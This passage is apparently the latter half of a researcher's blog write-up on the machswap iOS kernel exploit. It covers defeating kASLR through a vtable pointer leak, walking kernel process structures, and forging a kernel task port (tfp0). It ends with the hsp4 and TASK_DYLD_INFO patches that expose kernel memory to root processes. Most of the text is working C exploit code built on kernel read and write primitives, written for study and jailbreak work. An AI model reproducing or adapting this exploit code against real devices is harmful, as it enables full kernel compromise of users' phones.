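#include <stdint.h>

int main(void)
{
    uint64_t lowest = UINT64_MAX, highest = 0;

    /* slide_byte effectively spans 1 through 256, as described above */
    for (int slide_byte = 1; slide_byte <= 256; slide_byte++)
    {
        uint64_t base = 0x01000000ULL + ((uint64_t)slide_byte * 0x00200000ULL);
        if (base < lowest)  lowest  = base;
        if (base > highest) highest = base;
    }

    printf("lowest: 0x%llx, highest: 0x%llx, span: 0x%llx (~%llu MB)\n",
           lowest, highest, highest - lowest, (highest - lowest) / 1000000ULL);
    return 0;
}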

However, there is a trick you can use to guarantee that you won’t hit unmapped memory. Take a look at this output from jtool:

$ jtool -l ~/Desktop/kernels/84-1211 | grep LC_SEGMENT_64
LC 00: LC_SEGMENT_64          Mem: 0xfffffff007004000-0xfffffff007078000	__TEXT
LC 01: LC_SEGMENT_64          Mem: 0xfffffff007078000-0xfffffff007098000	__DATA_CONST
LC 02: LC_SEGMENT_64          Mem: 0xfffffff007098000-0xfffffff0075c8000	__TEXT_EXEC
LC 03: LC_SEGMENT_64          Mem: 0xfffffff0075c8000-0xfffffff0075cc000	__LAST
LC 04: LC_SEGMENT_64          Mem: 0xfffffff0075cc000-0xfffffff0075d0000	__KLD
LC 05: LC_SEGMENT_64          Mem: 0xfffffff0075d0000-0xfffffff007678000	__DATA
LC 06: LC_SEGMENT_64          Mem: 0xfffffff007678000-0xfffffff007690000	__BOOTDATA
LC 07: LC_SEGMENT_64          Mem: 0xfffffff005ca4000-0xfffffff006138000	__PRELINK_TEXT
LC 08: LC_SEGMENT_64          Mem: 0xfffffff0077e8000-0xfffffff0079e0000	__PRELINK_INFO
[...]

Up until the beginning of __PRELINK_TEXT, all regions (including __TEXT) are mapped completely contiguously (right as one segment ends, another one starts) at the base of the kernel virtual address space (VAS). Therefore, if we are able to find a pointer into __TEXT (ie. the address of a function), we can derive the base of the kernel via brute force, as we are guaranteed not to hit any unmapped memory! The only question is: how do we get such a pointer?

In C++, every object of a class with virtual methods contains a pointer to something called a vtable. The vtable is an array of “virtual” methods (methods which the object implements): simply a list of function pointers, and the pointer to it is located at offset 0x0 within the object. If we can find such a C++ object (and therefore its vtable), we can get our function pointer and derive the kernel slide.

Since we have a read primitive set up, and an attacker-controlled port, we can traverse kernel memory to find such a C++ object.

One example is the IOSurfaceRootUserClient object, which we created earlier when we set up our heap spray. We can register the userclient port we opened via the mach_ports_register API, which stores a pointer to that port in a field within our task struct: itk_registered.

kern_return_t
mach_ports_register(
	task_t			task,
	mach_port_array_t	memory,
	mach_msg_type_number_t	portsCnt)
{
        [...]

	for (i = 0; i < TASK_PORT_REGISTER_MAX; i++) {
		ipc_port_t old;

		old = task->itk_registered[i];
		task->itk_registered[i] = ports[i];
		ports[i] = old;
	}
        
        [...]

	return KERN_SUCCESS;
}

So from our task struct, we can read the itk_registered field to find the IOSurface ipc_port, follow its ip_kobject field to find the C++ object itself, dereference offset 0x0 of that object to find the vtable, and then dereference any of the vtable entries to get our __TEXT pointer. However, we first need to find our task struct. For this, we can look at itk_space. This is the IPC space which holds the Mach port rights owned by a task, mapping userland’s uint32_t port handles to kernel-side ipc_port_t’s. If we can find the kernel copy of a message we sent which contains a port we own, we can read that port’s ip_receiver field to find our itk_space, and from there our own task struct (ipc_space->is_task).

Luckily, our fakeport is owned by our process, we have a userland handle on it which we can send a message to, and we can then read the ip_messages struct within our fakeport to find the kernel representation of the Mach message which was sent. This is similar to a technique I have used in the past to get a buffer of data into kernelspace, except this time it is used for ports instead of data.

static kern_return_t send_port(mach_port_t rcv, mach_port_t myP)
{
    typedef struct {
        mach_msg_header_t          Head;
        mach_msg_body_t            msgh_body;
        mach_msg_port_descriptor_t task_port;
    } Request;

    [...]
    
    InP->msgh_body.msgh_descriptor_count = 1;
    InP->task_port.name = myP;
    InP->task_port.disposition = MACH_MSG_TYPE_COPY_SEND;
    InP->task_port.type = MACH_MSG_PORT_DESCRIPTOR;

    err = mach_msg(&InP->Head, MACH_SEND_MSG | MACH_SEND_TIMEOUT, InP->Head.msgh_size, 0, 0, 5, 0);
    
    [...]
}

Here we set up a message containing a Mach port descriptor, and place our port handle into that descriptor. We then call send_port using our fakeport as the rcv argument, and a newly allocated port with both receive and send rights as the myP argument.

Once the Mach message has been sent, it will be present within fakeport->ip_messages.port.messages. We can then traverse from this message to find the pointer to our task like so:

    ret = send_port(the_one, gangport);

    uint64_t ikmq_base = fakeport->ip_messages.port.messages;

    uint64_t ikm_header = 0x0;
    rk64(ikmq_base + 0x18, ikm_header); /* ipc_kmsg->ikm_header */

    uint64_t port_addr = 0x0;
    rk64(ikm_header + 0x24, port_addr); /* 0x24 is mach_msg_header_t + body + offset of our port into mach_port_descriptor_t */ 

    uint64_t itk_space = 0x0;
    rk64(port_addr + offsetof(kport_t, ip_receiver), itk_space);

    uint64_t ourtask = 0x0;
    rk64(itk_space + 0x28, ourtask); /* ipc_space->is_task */

Since we have a pointer to our task struct, we can now use the mach_ports_register trick to register the IOSurface UserClient, and perform a few more reads to find the vtable entry:

    ret = mach_ports_register(mach_task_self(), &client, 1);

    uint64_t iosruc_port = 0x0;
    rk64(ourtask + offsets->struct_offsets.task_itk_registered, iosruc_port);

    uint64_t iosruc_addr = 0x0;
    rk64(iosruc_port + offsetof(kport_t, ip_kobject), iosruc_addr);

    uint64_t iosruc_vtab = 0x0;
    rk64(iosruc_addr + 0x0, iosruc_vtab);

    uint64_t get_trap_for_index_addr = 0x0;
    rk64(iosruc_vtab + (offsets->iosurface.get_external_trap_for_index * 0x8), get_trap_for_index_addr);

get_trap_for_index_addr is the address of the IOSurfaceRootUserClient::getExternalTrapForIndex function, which resides in the kernel’s __TEXT region. We can then walk backwards until we reach the Mach-O magic value (MH_MAGIC_64) at the kernel header.

#define KERNEL_HEADER_OFFSET        0x4000
#define KERNEL_SLIDE_STEP           0x100000
    
    uint64_t kernel_base = (get_trap_for_index_addr & ~(KERNEL_SLIDE_STEP - 1)) + KERNEL_HEADER_OFFSET;

    do
    {
        uint32_t kbase_value = 0x0;
        rk32(kernel_base, kbase_value);
    
        if (kbase_value == MH_MAGIC_64)
        {
            LOG("found kernel_base: 0x%llx", kernel_base);
            break;
        }

        kernel_base -= KERNEL_SLIDE_STEP;
    } while (true);

    uint64_t kslide = kernel_base - offsets->constant.kernel_image_base;

As we have deduced the kslide value, kASLR has now been defeated, and we continue with our exploitation by building the final primitive: the fake kernel task port. This task port will allow full read and write access to the kernel’s VM map, allowing arbitrary modification of kernel data.

0x08 Building a Fake Kernel Task Port

A kernel task port is simply an ipc_port struct of type IKOT_TASK, with a representation of the kernel’s task_t struct attached. However, when the task port is used via the Mach API, many of the fields aren’t checked or accessed at any point. This means we don’t need to use the original ipc_port or task_t structs: we can simply forge arbitrary ones containing the minimum of data required for the Mach API to recognise them as a valid port. Luckily, there are only two things we need to find. The first is the kernel’s vm_map_t, which is a struct that holds data about the kernel’s virtual address space.

The kernel implements a nice feature which allows you to easily loop through proc_t structs (and hence their corresponding task_t counterparts) to find target processes, via a linked list (p_list) at the start of the proc_t struct. This includes the kernel’s proc and task structs (kernel_task actually runs as a “normal” process on your system, with the PID 0 – you can see it in Activity Monitor on macOS).

We already have the address of our own task_t from when we needed to find our IOSurfaceRootUserClient port earlier. So we can dereference the bsd_info pointer to get the corresponding proc_t struct, and then loop backwards through the list until we reach the first entry: the kernel’s proc struct, with PID 0.

struct	proc {
	LIST_ENTRY(proc) p_list;		/* List of all processes. */

	void * 		task;			/* corresponding task (static)*/
	struct	proc *	p_pptr;		 	/* Pointer to parent process.(LL) */

    [...]
    uint64_t kernproc = ourproc;
    while (kernproc != 0x0)
    {
        uint32_t found_pid = 0x0;
        rk32(kernproc + offsets->struct_offsets.proc_pid, found_pid);
        if (found_pid == 0)
        {
            break;
        }

        /* 
            kernproc will always be at the start of the linked list,
            so we loop backwards in order to find it
        */
        rk64(kernproc + 0x0, kernproc);
    }

From there we can read proc_t->task to get to the kernel’s task_t struct, which contains a field which is a pointer to the kernel’s vm_map_t:

struct task {
	/* Synchronization/destruction information */
	decl_lck_mtx_data(,lock)		/* Task's lock */
	_Atomic uint32_t	ref_count;	/* Number of references to me */
	boolean_t	active;		/* Task has not been terminated */
	boolean_t	halting;	/* Task is being halted */
	/* Virtual timers */
	uint32_t		vtimers;

	/* Miscellaneous */
	vm_map_t	map;		/* Address space description */
	queue_chain_t	tasks;	/* global list of tasks */

    [...]
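
The reads themselves aren’t shown here; a sketch of what they might look like using our rk64 primitive follows (the proc_task and task_vm_map offset names are hypothetical stand-ins for whatever your offsets struct calls them):

    /* sketch: follow kernproc -> kernel task -> kernel vm_map using rk64.
       the offset field names here are hypothetical placeholders. */
    uint64_t kern_task = 0x0;
    rk64(kernproc + offsets->struct_offsets.proc_task, kern_task);         /* proc_t->task */

    uint64_t kernel_vm_map = 0x0;
    rk64(kern_task + offsets->struct_offsets.task_vm_map, kernel_vm_map);  /* task->map */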

To build our fake task struct, we can simply use some hardcoded data, and drop in our kernel vm_map pointer:

    fake_task->lock.data = 0x0;
    fake_task->lock.type = 0x22;
    fake_task->ref_count = 100;
    fake_task->active = 1;
    fake_task->map = kernel_vm_map;
    *(uint32_t *)((uint64_t)fake_task + offsets->struct_offsets.task_itk_self) = 1;

We also need to find the kernel’s ipc_space: this is the struct which a port’s ip_receiver field points to, ie. the IPC space of the task holding that port’s receive right. This is easy to find, however, as the receiver of our IOSurfaceUserClient port is the kernel itself (that’s where messages sent on that port end up).

    /* 
        since our IOSurfaceRoot userclient is owned by kernel, the 
        ip_receiver field will point to kernel's ipc space 
    */ 
    uint64_t ipc_space_kernel = 0x0;
    rk64(iosruc_port + offsetof(kport_t, ip_receiver), ipc_space_kernel);
    LOG("ipc_space_kernel: 0x%llx", ipc_space_kernel);

We then temporarily turn our fakeport (the_one) into a kernel task port by updating its ip_receiver, which we can then use as an early tfp0 primitive in order to allocate and write some memory for our kernel task and kernel port structs (error checking omitted):
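
The update itself is a single write to our userland fakeport (a sketch, using the same kport_t structure as earlier):

    /* hand our fake port over to the kernel's IPC space, so it looks like a
       kernel-owned (kernel task) port */
    fakeport->ip_receiver = ipc_space_kernel;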

    /* the_one should now have access to kernel mem */

    uint64_t kbase_data = kread64(the_one, kernel_base);
    LOG("got kernel base: %llx", kbase_data);

    /* allocate kernel task */

    uint64_t kernel_task_buf = kalloc(the_one, 0x600);
    LOG("kernel_task_buf: 0x%llx", kernel_task_buf);

    kwrite(the_one, kernel_task_buf, (void *)fake_task, 0x600);

    /* allocate kernel port */
    uint64_t kernel_port_buf = kalloc(the_one, 0x300);
    LOG("kernel_port_buf: 0x%llx", kernel_port_buf);

    fakeport->ip_kobject = kernel_task_buf;

    kwrite(the_one, kernel_port_buf, (void *)fakeport, 0x300);

Our fakeport the_one is now a “full” (but forged) kernel task port (tfp0) which can be used to read, write, and allocate kernel memory, and is backed completely by kernel buffers – no userland allocations are used after this point.
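
For illustration, and assuming the mach/mach_vm.h user-level routines are available to the process (on iOS you may need to declare the prototypes yourself), the standard Mach VM calls against the_one now operate on kernel memory:

    /* illustrative usage of the forged kernel task port */
    uint64_t value = 0;
    mach_vm_size_t outsize = 0;
    mach_vm_read_overwrite(the_one, kernel_base, sizeof(value),
                           (mach_vm_address_t)&value, &outsize);          /* read 8 bytes of the kernel header */

    mach_vm_address_t scratch = 0;
    mach_vm_allocate(the_one, &scratch, 0x100, VM_FLAGS_ANYWHERE);        /* allocate kernel memory */

    mach_vm_write(the_one, scratch, (vm_offset_t)&value, sizeof(value));  /* write into our new allocation */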

0x09 Buttoning Up: HSP4, TASK_DYLD_INFO patch

There are a couple more finishing touches we need to do before we can exit our exploit. The first is setting up the hsp4 (host_get_special_port(..., 4, ...)) patch, which allows processes running as root to get a send right to the kernel task port (tfp0).

This is fairly easy to set up: we simply need to perform a write to the realhost struct, into the ipc_port_t special array.

struct	host {
	decl_lck_mtx_data(,lock)		/* lock to protect exceptions */
	ipc_port_t special[HOST_MAX_SPECIAL_PORT + 1];
	struct exception_action exc_actions[EXC_TYPES_COUNT];
};
    /*
        host_get_special_port(4) patch
        allows the kernel task port to be accessed by any root process 
    */
    kwrite64(the_one, realhost + 0x10 + (sizeof(uint64_t) * 4), kernel_port_buf);

We can then quickly elevate our UID to 0 (root) in order to check the patch worked, as the host_get_special_port API requires root access.
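
For reference, once running as root, retrieving the port again looks roughly like this brief sketch (4 being the special port slot we just patched):

    /* as root: fetch the kernel task port back out of host special port 4 */
    mach_port_t hsp4 = MACH_PORT_NULL;
    kern_return_t kr = host_get_special_port(mach_host_self(), HOST_LOCAL_NODE, 4, &hsp4);
    if (kr == KERN_SUCCESS && MACH_PORT_VALID(hsp4))
    {
        /* hsp4 is a send right to our forged kernel task port */
    }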

Note: we also de-elevate back to the mobile user before exiting the exploit as leaving ourselves as root can cause instability in the system upon exiting the app. Jailbreaks can quickly and easily re-elevate to root if and when required.

Another (new) patch is the TASK_DYLD_INFO patch, suggested by @Siguza here. The task_info API allows an application to retrieve information about a specific process, including info about the dynamic linker. As we can see in the following snippet, the kernel will return three fields of data stored in the task back to userland.

	case TASK_DYLD_INFO:
	{
		task_dyld_info_t info;

        [...]

		info = (task_dyld_info_t)task_info_out;
		info->all_image_info_addr = task->all_image_info_addr;
		info->all_image_info_size = task->all_image_info_size;

		/* only set format on output for those expecting it */
		if (*task_info_count >= TASK_DYLD_INFO_COUNT) {
			info->all_image_info_format = task_has_64Bit_addr(task) ?
				                 TASK_DYLD_ALL_IMAGE_INFO_64 :
				                 TASK_DYLD_ALL_IMAGE_INFO_32 ;
			*task_info_count = TASK_DYLD_INFO_COUNT;
		} else {
			*task_info_count = TASK_LEGACY_DYLD_INFO_COUNT;
		}
		break;
	}

Since the kernel doesn’t use dyld, nor will our fake task port ever be used by the kernel itself, we can use these fields to store data about the kernel instead. In this case, we use the all_image_info_addr field to store the slid base address of the kernel, and the all_image_info_size field to store the kernel slide. This avoids the need for offset-storing files and provides a clean way for other processes to find the (previously somewhat tricky to deduce) kernel slide.

    /* 
        task_info TASK_DYLD_INFO patch 
        this patch (credit @Siguza) allows you to provide tfp0 to the task_info
        API, and retrieve some data from the kernel's task struct
        we use it for storing the kernel base and kernel slide values 
    */ 
    *(uint64_t *)((uint64_t)fake_task + offsets->struct_offsets.task_all_image_info_addr) = kernel_base;
    *(uint64_t *)((uint64_t)fake_task + offsets->struct_offsets.task_all_image_info_size) = kslide;

You can then call task_info, providing tfp0 as your port and supplying the TASK_DYLD_INFO flag.
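
A minimal sketch of that call (tfp0 here being whatever handle you hold on the forged kernel task port, for example the hsp4 port retrieved earlier):

    /* read the kernel base and slide back out of the fake task struct */
    struct task_dyld_info dyld_info = {0};
    mach_msg_type_number_t count = TASK_DYLD_INFO_COUNT;
    if (task_info(tfp0, TASK_DYLD_INFO, (task_info_t)&dyld_info, &count) == KERN_SUCCESS)
    {
        uint64_t kernel_base  = dyld_info.all_image_info_addr;
        uint64_t kernel_slide = dyld_info.all_image_info_size;
        /* use kernel_base / kernel_slide as needed */
    }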

0x0A Closing Words

For a long time I was completely daunted by the idea of exploiting something as complex as the iOS kernel. However, once I dived in and gave it a go, it quickly started to make more and more sense. There is a lot of great reading material online to refer to, including writeups and other open-source exploits. I’m now a big fan of MIG reference counting bugs due to their simplicity and consistency in exploitation, and would love to find one as a 0day one day. ;)

Of course, thanks to @s1guza, @littlelailo, and @stek29 for development help, and @s0rrymybad for the initial bug details and PoC code. You can find their Twitter handles below.

If you have any questions feel free to @ me and/or follow me on Twitter, and take a look through my GitHub if you’re interested in other open-source iOS projects. Thanks!

Twitter: https://twitter.com/iBSparkes

GitHub: https://github.com/PsychoTea

machswap Source Code: https://github.com/PsychoTea/machswap

machswap2 (SMAP Version): https://github.com/PsychoTea/machswap2

@s1guza: https://twitter.com/s1guza

@littlelailo: https://twitter.com/littlelailo

@stek29: https://twitter.com/stek29

@s0rrymybad: https://twitter.com/s0rrymybad